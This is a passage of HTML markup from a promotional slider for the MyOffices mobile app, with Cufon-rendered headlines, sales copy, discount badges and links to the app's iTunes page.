                  <h3><cufon class="cufon cufon-canvas" alt="MyOffices� " style="width: 121px; height: 24px;"><canvas width="164" height="32" style="width: 164px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>MyOffices� </cufontext></cufon><cufon class="cufon cufon-canvas" alt="- " style="width: 14px; height: 24px;"><canvas width="58" height="32" style="width: 58px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>- </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Your " style="width: 60px; height: 24px;"><canvas width="103" height="32" style="width: 103px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="virtual " style="width: 86px; height: 24px;"><canvas width="129" height="32" style="width: 129px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>virtual </cufontext></cufon><cufon class="cufon cufon-canvas" alt="office " style="width: 73px; height: 24px;"><canvas width="116" height="32" style="width: 116px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>office </cufontext></cufon><cufon class="cufon cufon-canvas" alt="support " style="width: 99px; height: 24px;"><canvas width="142" height="32" style="width: 142px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>support </cufontext></cufon><cufon class="cufon cufon-canvas" alt="center" style="width: 75px; height: 24px;"><canvas width="115" height="32" style="width: 115px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>center</cufontext></cufon></h3>
                  <p>Get the app today, connect with a global audience. Local marketplace without boundaries. The power of reaching a few million mobile users today.</p>
                 </div>
                 
                 </a><div class="slider-button"><a href="http://www.benteractive.com/myoffices/apanel">
                  </a><a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-white buy"><cufon class="cufon cufon-canvas" alt="get " style="width: 50px; height: 24px;"><canvas width="93" height="32" style="width: 93px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="it " style="width: 30px; height: 24px;"><canvas width="73" height="32" style="width: 73px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>it </cufontext></cufon><cufon class="cufon cufon-canvas" alt="now" style="width: 57px; height: 24px;"><canvas width="84" height="32" style="width: 84px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>now</cufontext></cufon></a>
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-black free"><cufon class="cufon cufon-canvas" alt="Android " style="width: 73px; height: 21px;"><canvas width="102" height="28" style="width: 102px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>Android </cufontext></cufon><cufon class="cufon cufon-canvas" alt="&amp; " style="width: 22px; height: 21px;"><canvas width="51" height="28" style="width: 51px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>&amp; </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Iphone" style="width: 59px; height: 21px;"><canvas width="83" height="28" style="width: 83px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>Iphone</cufontext></cufon></a>                 </div>
                </div>
		       </div>
               <!-- slider-show one end here -->
               
               <!-- slider-show second begin here -->
               <div id="green" class="slider" style="position: absolute; top: 0px; left: 0px; display: none; z-index: 8; opacity: 0; width: 960px; height: 450px;">
                <div class="block-1 left">
                 <div class="discount" style="opacity: 1; left: 90px;"><h1 class="orange"><cufon class="cufon cufon-canvas" alt="-25" style="width: 58px; height: 36px;"><canvas width="111" height="48" style="width: 111px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>-25</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt="%" style="width: 19px; height: 20px;"><canvas width="42" height="27" style="width: 42px; height: 27px; top: -5px; left: -7px;"></canvas><cufontext>%</cufontext></cufon></span></h1></div>
                 <div class="slider-img" style="opacity: 1; left: 0px;">
                  <img src="/images/monic.png" alt="">                 </div>
                 <div class="slider-img-bg" style="opacity: 1; top: 0px;">
                  <img src="/images/monic-bg.png" alt="">                 </div>
                </div>
                <div class="block-2 left">
                
                 <div class="slider-text" style="right: 0px; opacity: 1;">
                  <h1><cufon class="cufon cufon-canvas" alt="Powerful " style="width: 169px; height: 36px;"><canvas width="233" height="48" style="width: 233px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>Powerful </cufontext></cufon><cufon class="cufon cufon-canvas" alt="sales " style="width: 100px; height: 36px;"><canvas width="165" height="48" style="width: 165px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>sales </cufontext></cufon><cufon class="cufon cufon-canvas" alt="tools " style="width: 100px; height: 36px;"><canvas width="164" height="48" style="width: 164px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>tools </cufontext></cufon><cufon class="cufon cufon-canvas" alt="!" style="width: 12px; height: 36px;"><canvas width="75" height="48" style="width: 75px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>!</cufontext></cufon></h1>
                  <h3><cufon class="cufon cufon-canvas" alt="MyOffices " style="width: 121px; height: 24px;"><canvas width="164" height="32" style="width: 164px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>MyOffices </cufontext></cufon><cufon class="cufon cufon-canvas" alt="� " style="width: 7px; height: 24px;"><canvas width="50" height="32" style="width: 50px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>� </cufontext></cufon><cufon class="cufon cufon-canvas" alt="- " style="width: 14px; height: 24px;"><canvas width="58" height="32" style="width: 58px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>- </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Connect " style="width: 102px; height: 24px;"><canvas width="145" height="32" style="width: 145px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Connect </cufontext></cufon><cufon class="cufon cufon-canvas" alt="with " style="width: 60px; height: 24px;"><canvas width="103" height="32" style="width: 103px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>with </cufontext></cufon><cufon class="cufon cufon-canvas" alt="your " style="width: 60px; height: 24px;"><canvas width="103" height="32" style="width: 103px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="customers" style="width: 122px; height: 24px;"><canvas width="160" height="32" style="width: 160px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>customers</cufontext></cufon></h3>
                  <p>The possibility of reaching millions of new local customers, connect with your customers where they live. Create a new touch point. Leverage the power of millions of businesses promoting each other.</p>
                 </div>
                 
                 <div class="slider-button">
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-white buy"><cufon class="cufon cufon-canvas" alt="get " style="width: 50px; height: 24px;"><canvas width="93" height="32" style="width: 93px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="it " style="width: 30px; height: 24px;"><canvas width="73" height="32" style="width: 73px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>it </cufontext></cufon><cufon class="cufon cufon-canvas" alt="now" style="width: 57px; height: 24px;"><canvas width="84" height="32" style="width: 84px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>now</cufontext></cufon></a>
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-black free"><cufon class="cufon cufon-canvas" alt="free " style="width: 39px; height: 21px;"><canvas width="67" height="28" style="width: 67px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>free </cufontext></cufon><cufon class="cufon cufon-canvas" alt="app" style="width: 32px; height: 21px;"><canvas width="56" height="28" style="width: 56px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>app</cufontext></cufon></a>                 </div>
                </div>
		       </div>
               <!-- slider-show second end here -->
               
               <!-- slider-show third begin here -->
               <div id="orange" class="slider" style="position: absolute; top: 0px; left: 0px; display: block; z-index: 9; opacity: 1; width: 960px; height: 450px;">
                <div class="block-1 left">
                 <div class="discount" style="opacity: 0; left: 0px;"><h1 class="orange"><cufon class="cufon cufon-canvas" alt="-25" style="width: 58px; height: 36px;"><canvas width="111" height="48" style="width: 111px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>-25</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt="%" style="width: 19px; height: 20px;"><canvas width="42" height="27" style="width: 42px; height: 27px; top: -5px; left: -7px;"></canvas><cufontext>%</cufontext></cufon></span></h1></div>
                 <div class="slider-img" style="opacity: 0.9852178492699125; left: -6.873700089490683px;">
                  <img src="/images/phonegroup.png" alt="">                 </div>
                 <div class="slider-img-bg" style="opacity: 0; top: -450px;">
                  <img src="/images/phonegroup-bg.png" alt="">                 </div>
                </div>
                <div class="block-2 left">
                
                 <div class="slider-text" style="right: -6.873700089490683px; opacity: 0.9852178492699125;">
                  <h1><cufon class="cufon cufon-canvas" alt="Leverage " style="width: 171px; height: 36px;"><canvas width="236" height="48" style="width: 236px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>Leverage </cufontext></cufon><cufon class="cufon cufon-canvas" alt="your " style="width: 90px; height: 36px;"><canvas width="155" height="48" style="width: 155px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="reach " style="width: 109px; height: 36px;"><canvas width="174" height="48" style="width: 174px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>reach </cufontext></cufon><cufon class="cufon cufon-canvas" alt="!" style="width: 12px; height: 36px;"><canvas width="75" height="48" style="width: 75px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>!</cufontext></cufon></h1>
                  <h3><cufon class="cufon cufon-canvas" alt="MyOffices " style="width: 121px; height: 24px;"><canvas width="164" height="32" style="width: 164px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>MyOffices </cufontext></cufon><cufon class="cufon cufon-canvas" alt="- " style="width: 14px; height: 24px;"><canvas width="58" height="32" style="width: 58px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>- </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Is " style="width: 28px; height: 24px;"><canvas width="71" height="32" style="width: 71px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Is </cufontext></cufon><cufon class="cufon cufon-canvas" alt="your " style="width: 60px; height: 24px;"><canvas width="103" height="32" style="width: 103px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="life " style="width: 46px; height: 24px;"><canvas width="89" height="32" style="width: 89px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>life </cufontext></cufon><cufon class="cufon cufon-canvas" alt="your " style="width: 60px; height: 24px;"><canvas width="103" height="32" style="width: 103px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="business?" style="width: 114px; height: 24px;"><canvas width="152" height="32" style="width: 152px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>business?</cufontext></cufon></h3>
                  <p>Your business should have an office, we create a virtual experience for your client. Imagine playing in a global marketplace overnight. If you were able to get one customer would it be worth the effort, to change your approach?</p>
                 </div>
                 
                 <div class="slider-button">
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-white buy"><cufon class="cufon cufon-canvas" alt="get " style="width: 50px; height: 24px;"><canvas width="93" height="32" style="width: 93px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="it " style="width: 30px; height: 24px;"><canvas width="73" height="32" style="width: 73px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>it </cufontext></cufon><cufon class="cufon cufon-canvas" alt="now" style="width: 57px; height: 24px;"><canvas width="84" height="32" style="width: 84px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>now</cufontext></cufon></a>
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-black free"><cufon class="cufon cufon-canvas" alt="today" style="width: 48px; height: 21px;"><canvas width="73" height="28" style="width: 73px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>today</cufontext></cufon></a>                 </div>
                </div>
		       </div>
              <!-- slider-show third end here -->
              
              <!-- slider-show fourth begin here -->
			  <div id="red" class="slider" style="position: absolute; top: 0px; left: 0px; display: none; z-index: 8; opacity: 0; width: 960px; height: 450px;">
                <div class="block-1 left">
                 <div class="discount" style="opacity: 1; left: 90px;"><h1 class="orange"><cufon class="cufon cufon-canvas" alt="-25" style="width: 58px; height: 36px;"><canvas width="111" height="48" style="width: 111px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>-25</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt="%" style="width: 19px; height: 20px;"><canvas width="42" height="27" style="width: 42px; height: 27px; top: -5px; left: -7px;"></canvas><cufontext>%</cufontext></cufon></span></h1></div>
                 <div class="slider-img" style="opacity: 1; left: 0px;">
                  <img src="/images/phone.png" alt="">                 </div>
                 <div class="slider-img-bg" style="opacity: 1; top: 0px;">
                  <img src="/images/phone-bg.png" alt="">                 </div>
                </div>
                <div class="block-2 left">
                 
                 <div class="slider-text" style="right: 0px; opacity: 1;">
                  <h1><cufon class="cufon cufon-canvas" alt="We " style="width: 64px; height: 36px;"><canvas width="128" height="48" style="width: 128px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>We </cufontext></cufon><cufon class="cufon cufon-canvas" alt="create " style="width: 122px; height: 36px;"><canvas width="186" height="48" style="width: 186px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>create </cufontext></cufon><cufon class="cufon cufon-canvas" alt="the " style="width: 70px; height: 36px;"><canvas width="134" height="48" style="width: 134px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>the </cufontext></cufon><cufon class="cufon cufon-canvas" alt="tools " style="width: 100px; height: 36px;"><canvas width="164" height="48" style="width: 164px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>tools </cufontext></cufon><cufon class="cufon cufon-canvas" alt="that " style="width: 84px; height: 36px;"><canvas width="148" height="48" style="width: 148px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>that </cufontext></cufon><cufon class="cufon cufon-canvas" alt="create " style="width: 122px; height: 36px;"><canvas width="186" height="48" style="width: 186px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>create </cufontext></cufon><cufon class="cufon cufon-canvas" alt="sales " style="width: 100px; height: 36px;"><canvas width="165" height="48" style="width: 165px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>sales </cufontext></cufon><cufon class="cufon cufon-canvas" alt="!" style="width: 12px; height: 36px;"><canvas width="75" height="48" style="width: 75px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>!</cufontext></cufon></h1>
                  <h3><cufon class="cufon cufon-canvas" alt="Location " style="width: 108px; height: 24px;"><canvas width="151" height="32" style="width: 151px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Location </cufontext></cufon><cufon class="cufon cufon-canvas" alt="is " style="width: 26px; height: 24px;"><canvas width="69" height="32" style="width: 69px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>is </cufontext></cufon><cufon class="cufon cufon-canvas" alt="everything " style="width: 133px; height: 24px;"><canvas width="176" height="32" style="width: 176px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>everything </cufontext></cufon><cufon class="cufon cufon-canvas" alt="- " style="width: 14px; height: 24px;"><canvas width="58" height="32" style="width: 58px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>- </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Increase " style="width: 107px; height: 24px;"><canvas width="151" height="32" style="width: 151px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Increase </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Your " style="width: 60px; height: 24px;"><canvas width="103" height="32" style="width: 103px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Sales" style="width: 62px; height: 24px;"><canvas width="100" height="32" style="width: 100px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Sales</cufontext></cufon></h3>
                  <p>We create a global marketplace for your brand, by diversifying your reach across a mobile platform serving 300 million users.</p>
                 </div>
                 
                 <div class="slider-button">
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-white buy"><cufon class="cufon cufon-canvas" alt="get " style="width: 50px; height: 24px;"><canvas width="93" height="32" style="width: 93px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="it " style="width: 30px; height: 24px;"><canvas width="73" height="32" style="width: 73px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>it </cufontext></cufon><cufon class="cufon cufon-canvas" alt="now" style="width: 57px; height: 24px;"><canvas width="84" height="32" style="width: 84px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>now</cufontext></cufon></a>
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-white buy"><cufon class="cufon cufon-canvas" alt="Limited " style="width: 105px; height: 24px;"><canvas width="148" height="32" style="width: 148px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Limited </cufontext></cufon><cufon class="cufon cufon-canvas" alt="free " style="width: 63px; height: 24px;"><canvas width="106" height="32" style="width: 106px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>free </cufontext></cufon><cufon class="cufon cufon-canvas" alt="offer" style="width: 74px; height: 24px;"><canvas width="108" height="32" style="width: 108px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>offer</cufontext></cufon></a>                 </div>
                </div>
		       </div>
               <!-- slider-show fourth end here -->
               
               <!-- slider-show fifth begin here -->
               <div id="magenta" class="slider" style="position: absolute; top: 0px; left: 0px; display: none; z-index: 8; opacity: 0; width: 960px; height: 450px;">
                <div class="block-1 left">
                 <div class="discount" style="opacity: 1; left: 90px;"><h1 class="orange"><cufon class="cufon cufon-canvas" alt="35%" style="width: 76px; height: 36px;"><canvas width="118" height="48" style="width: 118px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>35%</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt="%" style="width: 19px; height: 20px;"><canvas width="42" height="27" style="width: 42px; height: 27px; top: -5px; left: -7px;"></canvas><cufontext>%</cufontext></cufon></span></h1></div>
                 <div class="slider-img" style="opacity: 1; left: 0px;">
                  <img src="/images/monic.png" alt="">                 </div>
                 <div class="slider-img-bg" style="opacity: 1; top: 0px;">
                  <img src="/images/monic-bg.png" alt="">                 </div>
                </div>
                <div class="block-2 left">
                
                 <div class="slider-text" style="right: 0px; opacity: 1;">
                  <h1><cufon class="cufon cufon-canvas" alt="Get " style="width: 71px; height: 36px;"><canvas width="135" height="48" style="width: 135px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>Get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="our " style="width: 71px; height: 36px;"><canvas width="135" height="48" style="width: 135px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>our </cufontext></cufon><cufon class="cufon cufon-canvas" alt="mobile " style="width: 135px; height: 36px;"><canvas width="199" height="48" style="width: 199px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>mobile </cufontext></cufon><cufon class="cufon cufon-canvas" alt="app " style="width: 77px; height: 36px;"><canvas width="141" height="48" style="width: 141px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>app </cufontext></cufon><cufon class="cufon cufon-canvas" alt="today!" style="width: 112px; height: 36px;"><canvas width="175" height="48" style="width: 175px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>today!</cufontext></cufon></h1>
                  <h3><cufon class="cufon cufon-canvas" alt="MyOffices " style="width: 121px; height: 24px;"><canvas width="164" height="32" style="width: 164px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>MyOffices </cufontext></cufon><cufon class="cufon cufon-canvas" alt="- " style="width: 14px; height: 24px;"><canvas width="58" height="32" style="width: 58px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>- </cufontext></cufon><cufon class="cufon cufon-canvas" alt="A " style="width: 23px; height: 24px;"><canvas width="66" height="32" style="width: 66px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>A </cufontext></cufon><cufon class="cufon cufon-canvas" alt="mobile " style="width: 89px; height: 24px;"><canvas width="132" height="32" style="width: 132px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>mobile </cufontext></cufon><cufon class="cufon cufon-canvas" alt="social " style="width: 75px; height: 24px;"><canvas width="118" height="32" style="width: 118px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>social </cufontext></cufon><cufon class="cufon cufon-canvas" alt="network" style="width: 97px; height: 24px;"><canvas width="133" height="32" style="width: 133px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>network</cufontext></cufon></h3>
                  <p>Let us create a new playing field for you, reach new customers today. In the palm of your hand you have the ability to get access to millions of services. Unleash your potential. Create a new reality for your business today by joining our network.</p>
                 </div>
                 
                 <div class="slider-button">
                  <a href="#" class="button-white buy"><cufon class="cufon cufon-canvas" alt="get " style="width: 50px; height: 24px;"><canvas width="93" height="32" style="width: 93px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="it " style="width: 30px; height: 24px;"><canvas width="73" height="32" style="width: 73px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>it </cufontext></cufon><cufon class="cufon cufon-canvas" alt="now" style="width: 57px; height: 24px;"><canvas width="84" height="32" style="width: 84px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>now</cufontext></cufon></a>
                  <a href="#" class="button-black free"><cufon class="cufon cufon-canvas" alt="GLOBAL " style="width: 74px; height: 21px;"><canvas width="102" height="28" style="width: 102px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>GLOBAL </cufontext></cufon><cufon class="cufon cufon-canvas" alt="ACCESS" style="width: 67px; height: 21px;"><canvas width="90" height="28" style="width: 90px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>ACCESS</cufontext></cufon></a>                 </div>
                </div>
		       </div>
               <!-- slider-show fifth end here -->
               
               <!-- slider-show sixth begin here -->
               <div id="blue" class="slider" style="position: absolute; top: 0px; left: 0px; display: none; z-index: 8; opacity: 0; width: 960px; height: 450px;">
                <div class="block-1 left">
                 <div class="discount" style="opacity: 1; left: 90px;"><h1 class="orange"><cufon class="cufon cufon-canvas" alt="55" style="width: 43px; height: 36px;"><canvas width="96" height="48" style="width: 96px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>55</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt="%" style="width: 19px; height: 20px;"><canvas width="42" height="27" style="width: 42px; height: 27px; top: -5px; left: -7px;"></canvas><cufontext>%</cufontext></cufon></span></h1></div>
                 <div class="slider-img" style="opacity: 1; left: 0px;">
                  <img src="/images/phonegroup.png" alt="">                 </div>
                 <div class="slider-img-bg" style="opacity: 1; top: 0px;">
                  <img src="/images/phonegroup-bg.png" alt="">                 </div>
                </div>
                <div class="block-2 left">
                
                 <div class="slider-text" style="right: 0px; opacity: 1;">
                  <h1><cufon class="cufon cufon-canvas" alt="Mobify " style="width: 130px; height: 36px;"><canvas width="194" height="48" style="width: 194px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>Mobify </cufontext></cufon><cufon class="cufon cufon-canvas" alt="your " style="width: 90px; height: 36px;"><canvas width="155" height="48" style="width: 155px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="business " style="width: 165px; height: 36px;"><canvas width="230" height="48" style="width: 230px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>business </cufontext></cufon><cufon class="cufon cufon-canvas" alt="!" style="width: 12px; height: 36px;"><canvas width="75" height="48" style="width: 75px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>!</cufontext></cufon></h1>
                  <h3><cufon class="cufon cufon-canvas" alt="MyOffices " style="width: 121px; height: 24px;"><canvas width="164" height="32" style="width: 164px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>MyOffices </cufontext></cufon><cufon class="cufon cufon-canvas" alt="� " style="width: 7px; height: 24px;"><canvas width="50" height="32" style="width: 50px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>� </cufontext></cufon><cufon class="cufon cufon-canvas" alt="- " style="width: 14px; height: 24px;"><canvas width="58" height="32" style="width: 58px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>- </cufontext></cufon><cufon class="cufon cufon-canvas" alt="A " style="width: 23px; height: 24px;"><canvas width="66" height="32" style="width: 66px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>A </cufontext></cufon><cufon class="cufon cufon-canvas" alt="global " style="width: 82px; height: 24px;"><canvas width="125" height="32" style="width: 125px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>global </cufontext></cufon><cufon class="cufon cufon-canvas" alt="tool " style="width: 54px; height: 24px;"><canvas width="97" height="32" style="width: 97px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>tool </cufontext></cufon><cufon class="cufon cufon-canvas" alt="to " style="width: 31px; height: 24px;"><canvas width="75" height="32" style="width: 75px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>to </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Increase " style="width: 107px; height: 24px;"><canvas width="151" height="32" style="width: 151px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Increase </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Your " style="width: 60px; height: 24px;"><canvas width="103" height="32" style="width: 103px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Sales" style="width: 62px; height: 24px;"><canvas width="100" height="32" style="width: 100px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Sales</cufontext></cufon></h3>
                  <p>400 million Mobile phones, 200 million Other devices. Create a new portal for your clients to reach you instantly. Your clients want a new way to reach you.</p>
                 </div>
                 
                 <div class="slider-button">
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-white buy"><cufon class="cufon cufon-canvas" alt="get " style="width: 50px; height: 24px;"><canvas width="93" height="32" style="width: 93px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="it " style="width: 30px; height: 24px;"><canvas width="73" height="32" style="width: 73px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>it </cufontext></cufon><cufon class="cufon cufon-canvas" alt="now" style="width: 57px; height: 24px;"><canvas width="84" height="32" style="width: 84px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>now</cufontext></cufon></a>
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-black free"><cufon class="cufon cufon-canvas" alt="free " style="width: 39px; height: 21px;"><canvas width="67" height="28" style="width: 67px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>free </cufontext></cufon><cufon class="cufon cufon-canvas" alt="app" style="width: 32px; height: 21px;"><canvas width="56" height="28" style="width: 56px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>app</cufontext></cufon></a>                 </div>
                </div>
		       </div>
              <!-- slider-show sixth end here -->
              
              <!-- slider-show seventh begin here -->
               <div id="darkred" class="slider" style="position: absolute; top: 0px; left: 0px; display: none; z-index: 8; opacity: 0; width: 960px; height: 450px;">
                <div class="block-1 left">
                 <div class="discount" style="opacity: 1; left: 90px;"><h1 class="orange"><cufon class="cufon cufon-canvas" alt="-35" style="width: 58px; height: 36px;"><canvas width="111" height="48" style="width: 111px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>-35</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt="%" style="width: 19px; height: 20px;"><canvas width="42" height="27" style="width: 42px; height: 27px; top: -5px; left: -7px;"></canvas><cufontext>%</cufontext></cufon></span></h1></div>
                 <div class="slider-img" style="opacity: 1; left: 0px;">
                  <img src="/images/monic.png" alt="">                 </div>
                 <div class="slider-img-bg" style="opacity: 1; top: 0px;">
                  <img src="/images/monic-bg.png" alt="">                 </div>
                </div>
                <div class="block-2 left">
                
                 <div class="slider-text" style="right: 0px; opacity: 1;">
                  <h1><cufon class="cufon cufon-canvas" alt="Powerful " style="width: 169px; height: 36px;"><canvas width="233" height="48" style="width: 233px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>Powerful </cufontext></cufon><cufon class="cufon cufon-canvas" alt="sales " style="width: 100px; height: 36px;"><canvas width="165" height="48" style="width: 165px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>sales </cufontext></cufon><cufon class="cufon cufon-canvas" alt="tools " style="width: 100px; height: 36px;"><canvas width="164" height="48" style="width: 164px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>tools </cufontext></cufon><cufon class="cufon cufon-canvas" alt="!" style="width: 12px; height: 36px;"><canvas width="75" height="48" style="width: 75px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>!</cufontext></cufon></h1>
                  <h3><cufon class="cufon cufon-canvas" alt="Market " style="width: 88px; height: 24px;"><canvas width="132" height="32" style="width: 132px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Market </cufontext></cufon><cufon class="cufon cufon-canvas" alt="- " style="width: 14px; height: 24px;"><canvas width="58" height="32" style="width: 58px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>- </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Your " style="width: 60px; height: 24px;"><canvas width="103" height="32" style="width: 103px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Product" style="width: 91px; height: 24px;"><canvas width="131" height="32" style="width: 131px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Product</cufontext></cufon></h3>
                  <p>Create a contact portal, join our platform. Let new and current consumers find your services based on their location. Act now- Join Today. We are creating a global platform for everyone that is truly portable.</p>
                 </div>
                 
                 <div class="slider-button">
